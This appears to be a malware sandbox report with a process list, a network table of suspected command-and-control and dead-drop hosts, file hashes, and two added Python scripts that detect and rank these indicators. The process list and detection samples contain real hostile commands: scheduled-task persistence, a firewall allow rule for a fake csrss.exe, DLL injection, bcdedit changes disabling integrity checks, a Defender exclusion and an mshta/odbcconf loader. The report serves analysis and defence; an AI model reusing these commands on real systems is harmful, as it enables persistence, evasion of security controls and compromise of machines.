netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
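The process list above is the raw record of what ran. As an added example that is not part of this report or of the sandbox's own tooling, the Python below applies a small set of detection rules to those command lines: mshta launching inline VBScript, odbcconf `regsvr` as a DLL-loading LOLBin, the `echo | set /p = "MZ"` trick that rebuilds a PE from chunks, the Defender exclusion, the firewall allow rule, `csrss.exe` running from outside System32, the ONLOGON/HIGHEST scheduled task, and the `bcdedit` boot-entry changes that switch integrity checks off. Rule names and regexes are my own; the ATT&CK IDs are the standard mappings for those behaviours. The sample input is copied verbatim from the process list above, with the `makecab.exe` line from the same list as a negative control.

```python
import re
from collections import Counter

# Process command lines copied from this report's process list, plus the
# benign makecab.exe line from the same list as a negative control.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )',
    r'C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"',
    r'odbcconf.exe /a { reGSVr .\9v~4.Ku}',
    r'cmd.exe /c taskkill /f /im chrome.exe',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15a8461882.exe"',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\rss\csrss.exe /306-306',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108103628.log C:\Windows\Logs\CBS\CbsPersist_20241108103628.cab',
]

# (rule name, ATT&CK technique, pattern). Names and regexes are my own;
# the technique IDs are the standard MITRE mappings for these behaviours.
# Everything is case-insensitive because the loader randomises letter case.
RULES = [
    ("mshta_inline_script", "T1218.005",
     re.compile(r'mshta\.exe"?\s+(?:vbscript|javascript):', re.I)),
    ("odbcconf_regsvr", "T1218.008",
     re.compile(r'odbcconf\.exe.*\bregsvr\b', re.I)),
    ("mz_header_write", "T1140",            # "MZ" written via set /p, then copy /b stitches the PE
     re.compile(r'set\s*/p\s*=\s*"+MZ"+', re.I)),
    ("defender_exclusion", "T1562.001",
     re.compile(r'add-mppreference\b.*-exclusion', re.I)),
    ("firewall_allow_rule", "T1562.004",
     re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*action=allow', re.I)),
    ("csrss_masquerade", "T1036.005",       # csrss.exe from any path except System32
     re.compile(r'[a-z]:\\(?!windows\\system32\\)[^\s"]*\\csrss\.exe', re.I)),
    ("schtasks_logon_highest", "T1053.005",
     re.compile(r'schtasks\s+/create\b.*(?:/sc\s+onlogon.*/rl\s+highest|/rl\s+highest.*/sc\s+onlogon)', re.I)),
    ("bcd_integrity_off", "T1553.006",      # driver signature enforcement switched off
     re.compile(r'bcdedit\.exe\s+[-/]set\b.*\b(?:nointegritychecks|testsigning)\b', re.I)),
    ("bcd_default_entry_changed", "T1553.006",
     re.compile(r'bcdedit\.exe\s+[-/]default\s+\{', re.I)),
    ("browser_kill", "T1555.003",           # stealers kill the browser to unlock its credential DB
     re.compile(r'taskkill\b.*/im\s+(?:chrome|msedge|firefox)\.exe', re.I)),
]


def scan_line(cmdline):
    """Names of every rule that fires on one command line."""
    return [name for name, _, pat in RULES if pat.search(cmdline)]


def scan(cmdlines):
    """(index, rule, technique) for every hit across a process list."""
    return [(i, name, tech)
            for i, line in enumerate(cmdlines)
            for name, tech, pat in RULES if pat.search(line)]


def summarize(cmdlines):
    """Hit count per rule, to rank which behaviours dominate a sample."""
    return Counter(name for _, name, _ in scan(cmdlines))


if __name__ == "__main__":
    for i, name, tech in scan(SAMPLE_CMDLINES):
        print(f"[{tech}] {name:<26} line {i}: {SAMPLE_CMDLINES[i][:70]}")
    print(summarize(SAMPLE_CMDLINES))
```

The `csrss_masquerade` rule fires three times on the sample (the firewall rule, the process itself and the scheduled task all name `C:\Windows\rss\csrss.exe`), which is the kind of repetition that makes a single masqueraded path a good pivot across the whole process tree.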
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |
| FR | 212.193.30.45:80 | | tcp |
| FR | 212.193.30.45:80 | | tcp |
| HU | 91.219.236.27:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| HU | 91.219.236.27:80 | | tcp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 91.219.236.27:80 | | tcp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| HU | 91.219.236.27:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | cloudjah.com | udp |
| US | 8.8.8.8:53 | mstdn.social | udp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| US | 8.8.8.8:53 | one-mature-tube.me | udp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| US | 8.8.8.8:53 | koyu.space | udp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| HU | 91.219.236.27:80 | | tcp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 91.219.236.27:80 | | tcp |
| MD | 94.158.245.167:80 | | tcp |
| DE | 159.69.246.184:13127 | | tcp |
| MD | 94.158.245.167:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| MD | 94.158.245.167:80 | | tcp |
| FR | 212.193.30.29:80 | | tcp |
| FR | 212.193.30.29:80 | | tcp |
| MD | 94.158.245.167:80 | | tcp |
| MD | 94.158.245.167:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| MD | 94.158.245.167:80 | | tcp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| HU | 185.163.204.216:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 185.163.204.216:80 | | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| RO | 185.225.19.238:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RO | 185.225.19.238:80 | | tcp |
| DE | 159.69.246.184:13127 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| HU | 185.163.204.218:80 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 212.192.241.62:80 | | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| DE | 212.192.241.62:80 | | tcp |
| US | 23.192.22.89:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| HU | 185.163.204.218:80 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| DE | 159.69.246.184:13127 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | nameiusr.com | udp |
| US | 8.8.8.8:53 | chrlerym.com | udp |
| US | 8.8.8.8:53 | opsiters.com | udp |
| US | 8.8.8.8:53 | logs.nameiusr.com | udp |
| US | 8.8.8.8:53 | logs.chrlerym.com | udp |
| US | 8.8.8.8:53 | logs.opsiters.com | udp |
| US | 8.8.8.8:53 | 879f41fb-1540-475d-a8d7-32a3f56501a8.uuid.nameiusr.com | udp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | server16.nameiusr.com | udp |
| SG | 13.251.16.150:443 | server16.nameiusr.com | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| DE | 159.69.246.184:13127 | | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | dumancue.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| DE | 159.69.246.184:13127 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 49.13.236.103:443 | mstdn.social | tcp |
| DE | 178.63.82.37:443 | koyu.space | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| RU | 185.215.113.44:23759 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
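The table above lists every connection in the order it happened, which is not the order an analyst wants. As an added example (mine, not part of the report), the Python below parses such rows, aggregates them per destination and ranks them for IOC triage: direct-to-IP connections with no resolved hostname, especially on ports like 23759 or 13127, sort to the top; the profile and paste pages that the report's "Legitimate hosting services abused for malware hosting/C2" signature refers to are tagged as dead-drop resolvers; ip-api.com and iplogger.org are tagged as the geolocation and tracking beacons the report flags; resolver queries and Microsoft/Google PKI background traffic sink to the bottom. The host lists are assumptions for this example and should be tuned against your own sandbox baseline. The parser also handles rows exported with an empty Domain cell and the protocol shifted into it. Sample rows are copied from the table above.

```python
import re
from collections import Counter

# Rows copied from this report's Network table. Some exports leave the
# Domain cell empty for unresolved connections and shift "tcp" into it;
# parse_row() accepts both shapes.
SAMPLE_ROWS = [
    "| US | 8.8.8.8:53 | gp.gamebuy768.com | udp |",
    "| FR | 212.193.30.45:80 | tcp | |",
    "| US | 208.95.112.1:80 | ip-api.com | tcp |",
    "| US | 172.67.74.161:443 | iplogger.org | tcp |",
    "| RU | 185.215.113.44:23759 | tcp | |",
    "| DE | 159.69.246.184:13127 | tcp | |",
    "| DE | 49.13.236.103:443 | mstdn.social | tcp |",
    "| US | 104.20.4.235:443 | pastebin.com | tcp |",
    "| NL | 149.154.167.99:443 | t.me | tcp |",
    "| US | 72.84.118.132:8080 | tcp | |",
    "| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |",
    "| US | 20.150.70.36:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |",
    "| RU | 185.215.113.44:23759 | tcp | |",
    "| US | 172.67.74.161:443 | iplogger.org | tcp |",
    "| RU | 185.215.113.44:23759 | tcp | |",
]

ROW_RE = re.compile(
    r"^\|\s*(?P<cc>[A-Z]{2})\s*\|\s*(?P<dst>[\d.]+:\d+)\s*\|\s*(?P<c3>[^|]*)\|\s*(?P<c4>[^|]*)\|"
)

# Classification lists: assumptions for this example, not facts from the report.
# 8.8.8.8 is the sandbox resolver; the noise suffixes are OS background traffic;
# the other sets follow the report's own "geolocation lookup", "external IP
# lookup" and "legitimate hosting services abused" signatures.
RESOLVERS = {"8.8.8.8"}
NOISE_SUFFIXES = (".microsoft.com", ".windows.net", ".pki.goog")
GEOIP_SERVICES = {"ip-api.com"}
TRACKERS = {"iplogger.org"}
DEAD_DROPS = {"mstdn.social", "koyu.space", "pastebin.com", "t.me"}
WELL_KNOWN_PORTS = {53, 80, 443}

SEVERITY = {
    "nonstandard_port": 3, "dead_drop_resolver": 2, "direct_ip": 2,
    "tracking_beacon": 1, "geoip_lookup": 1, "dns_query": 0, "os_noise": 0,
}


def parse_row(row):
    """Return {cc, dst, domain, proto} for a data row, or None for header/other lines."""
    m = ROW_RE.match(row)
    if not m:
        return None
    c3, c4 = m["c3"].strip(), m["c4"].strip()
    if c3.lower() in ("tcp", "udp") and not c4:   # shifted row: proto sits in the Domain column
        domain, proto = "", c3
    else:
        domain, proto = c3, c4
    return {"cc": m["cc"], "dst": m["dst"], "domain": domain, "proto": proto.lower()}


def classify(domain, ip, port):
    """Tag one destination; resolver and OS-noise checks short-circuit."""
    if ip in RESOLVERS:
        return ["dns_query"]
    if domain.endswith(NOISE_SUFFIXES):
        return ["os_noise"]
    tags = []
    if not domain:
        tags.append("direct_ip")              # hard-coded C2 or raw-IP payload download
        if port not in WELL_KNOWN_PORTS:
            tags.append("nonstandard_port")
    if domain in GEOIP_SERVICES:
        tags.append("geoip_lookup")
    if domain in TRACKERS:
        tags.append("tracking_beacon")
    if domain in DEAD_DROPS:
        tags.append("dead_drop_resolver")     # public page that hands out the real C2 address
    return tags


def triage(rows):
    """Aggregate rows per (destination, domain), tag them, most suspicious first."""
    counts = Counter()
    for row in rows:
        rec = parse_row(row)
        if rec:
            counts[(rec["dst"], rec["domain"])] += 1
    out = []
    for (dst, domain), n in counts.items():
        ip, port = dst.rsplit(":", 1)
        tags = classify(domain, ip, int(port))
        score = max((SEVERITY[t] for t in tags), default=0)
        out.append({"dst": dst, "domain": domain, "count": n, "tags": tags, "score": score})
    out.sort(key=lambda r: (-r["score"], -r["count"], r["dst"]))
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_ROWS):
        print(f'{r["score"]} {r["count"]:>2}x {r["dst"]:<22} {r["domain"]:<45} {",".join(r["tags"])}')
```

On the sample, `185.215.113.44:23759` ranks first (three connections, no hostname, non-standard port), followed by the other two raw-IP high-port destinations; the iplogger.org beacon is reported once with its repeat count rather than as a stream of identical rows.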
Files
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\setup_install.exe
| MD5 | f7154abf1245e17ee802340608c5f728 |
| SHA1 | 48fc1a71ad8dd0f04699b60144ed28e50ecd61dd |
| SHA256 | 6a1adfee6f5c76521479177391647ec0cdd3c367600a72904d87c4edb25f5344 |
| SHA512 | e5f79d338e0c2bbb65a799c389479ec955d7370c674e5aa13ecbae7d62be57f51f4f7b24e597e36078c901539a60923baf489483689781005e05dd76095b2192 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/2860-68-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2860-81-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2860-80-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2860-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2860-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-84-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-83-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-82-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-90-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-89-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2860-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1500b8e65c1f53.exe
| MD5 | 23a1ebcc1aa065546e0628bed9c6b621 |
| SHA1 | d8e8a400990af811810f5a7aea23f27e3b099aad |
| SHA256 | 9615e9c718ebdfae25e1424363210f252003cf2bc41bffdd620647fc63cd817a |
| SHA512 | 8942ce8c005f423d290220f7cc53ee112654428793287c0e330ee3318630845a86afcd9802fe56e540051f8224a71ddf9e4af59ea418469005ba0fbd770989a3 |
memory/2188-173-0x00000000002D0000-0x00000000003AE000-memory.dmp
memory/2860-150-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2860-149-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2860-148-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2860-146-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/640-175-0x0000000000B30000-0x0000000000B4E000-memory.dmp
memory/2860-142-0x0000000000400000-0x000000000051D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156d9ca8467.exe
| MD5 | 31f859eb06a677bbd744fc0cc7e75dc5 |
| SHA1 | 273c59023bd4c58a9bc20f2d172a87f1a70b78a5 |
| SHA256 | 671539883e1cd86422b94e84cc21f3d9737c8327b7a76c4972768248cb26b7e6 |
| SHA512 | 7d6a611bc76132a170a32fcbe4c3e3b528a90390b612ce2171febea59f1b723dafc0ec9628df50d07a9841561ddb23cdefbf3adcac160da60e337e7f3695e4ec |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1515dbfc0edab0.exe
| MD5 | 9c41934cf62aa9c4f27930d13f6f9a0c |
| SHA1 | d8e5284e5cb482abaafaef1b5e522f38294001d2 |
| SHA256 | c55a03ca5ef870fd4b4fdf8595892155090f796578f5dd457030094b333d26b0 |
| SHA512 | d2c4d6af13557be60cf4df941f3184a5cce9305c1ca7a66c5a998073dbe2e3462a4afce992432075a875ca09297bb5559ccd7bca3e1fe2c59760a675192f49d5 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun154ca5fada.exe
| MD5 | aa75aa3f07c593b1cd7441f7d8723e14 |
| SHA1 | f8e9190ccb6b36474c63ed65a74629ad490f2620 |
| SHA256 | af890b72e50681eee069a7024c0649ac99f60e781cb267d4849dae4b310d59c1 |
| SHA512 | b1984c431939e92ea6918afbbc226691d1e46e48f11db906fec3b7e5c49075f33027a2c6a16ab4861c906faa6b50fddc44201922e44a0243f9883b701316ca2b |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun1524d92394d.exe
| MD5 | 7362b881ec23ae11d62f50ee2a4b3b4c |
| SHA1 | 2ae1c2a39a8f8315380f076ade80028613b15f3e |
| SHA256 | 8af8843d8d5492c165ef41a8636f86f104bf1c3108372a0933961810c9032cf2 |
| SHA512 | 071879a8901c4d0eba2fa886b0a8279f4b9a2e3fbc7434674a07a5a8f3d6a6b87a6dce414d70a12ab94e3050bd3b55e8bfaf8ffea6d24ef6403c70bd4a1c5b74 |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15591a43f8a.exe
| MD5 | c18fd5cf734e7438fb340750cd11c605 |
| SHA1 | 7a199f1836fdf27932cee19f83c7421ed05e9108 |
| SHA256 | 36a0dfbe4e1491c2d4b84e06fd4cf17d24e8a770f32618d6951f93db14158bc7 |
| SHA512 | d56380274c2d7e2b220dc994600c3edfc1a3511440418fbbc98d718368138d8f388fe337256b9d57b01ca5aad4a5d92d07c1d87ed8a9d03b1d1289b9cfcb27a0 |
memory/2064-174-0x0000000000050000-0x0000000000058000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X9ERS98RO2SX4EIUCCWY.temp
| MD5 | 384a03f56f305bfdcff6c9b87804a2da |
| SHA1 | b71c36abc54cf176196bbfbf743461abf179af7e |
| SHA256 | 7a72ba790f87a0cb9dc95a36d55c132b26d4658186020c62aae15d7773a66bed |
| SHA512 | 27488a0bb087f0bda41e66bf02a581a5bc0eb2f1d37fe03406f2322773aef7ade15a58fe9cbb4779be23e8c97f1c43d92154c6fd0a5080d7a10a30b8cbc85903 |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15372e8db79ed3d.exe
| MD5 | e52d81731d7cd80092fc66e8b1961107 |
| SHA1 | a7d04ed11c55b959a6faaaa7683268bc509257b2 |
| SHA256 | 4b6212f2dbf8eb176019a4748ce864dd04753af4f46c3d6d89d392a5fb007e70 |
| SHA512 | 69046e90e402156f358efa3baf74337eacd375a767828985ebe94e1b886d5b881e3896d2200c9c9b90abab284d75466bc649b81c9f9e89f040b0db5d301d1977 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun156aa32cae4a.exe
| MD5 | 0fef60f3a25ff7257960568315547fc2 |
| SHA1 | 8143c78b9e2a5e08b8f609794b4c4015631fcb0b |
| SHA256 | c7105cfcf01280ad26bbaa6184675cbd41dac98690b0dcd6d7b46235a9902099 |
| SHA512 | d999088ec14b8f2e1aa3a2f63e57488a5fe3d3375370c68c5323a21c59a643633a5080b753e3d69dfafe748dbdfeb6d7fa94bdf5272b4a9501fd3918633ee1e5 |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15635943177.exe
| MD5 | b0e64f3da02fe0bac5102fe4c0f65c32 |
| SHA1 | eaf3e3cb39714a9fae0f1024f81a401aaf412436 |
| SHA256 | dbc10a499e0c3bddcfa7266d5cce117343e0d8a164bdaa5d5dbcfee5d5392571 |
| SHA512 | 579d4ba54a5a41cf2261360f0c009fd3e7b6990499e2366cb6f1eceacb2cc6215f053e780484908211b824711acbea389f3d91de6f40b9e2b6564baedd106805 |
C:\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun15c4c762b69ba5.exe
| MD5 | 480f84b5495d22186ca365cfbfc51594 |
| SHA1 | eae7c5ed3b0f729360fdd3879f65367a3d14dd95 |
| SHA256 | ab63359f23420ce59260dddb7a1747ff97daf656de360a79e35531032ba26e3f |
| SHA512 | ef7df3d3427e621ecc4bbdba0df717ba7509d36896bccfab1a2c461f019c95728936a42a6261649e9a6b8f5037f42678bdbe51ea82af68b8e8f8a9765ee57482 |
\Users\Admin\AppData\Local\Temp\7zS8C9D79A6\Sun157e7a96e632.exe
| MD5 | dcde74f81ad6361c53ebdc164879a25c |
| SHA1 | 640f7b475864bd266edba226e86672101bf6f5c9 |
| SHA256 | cc10c90381719811def4bc31ff3c8e32c483c0eeffcb149df0b071e5a60d517b |
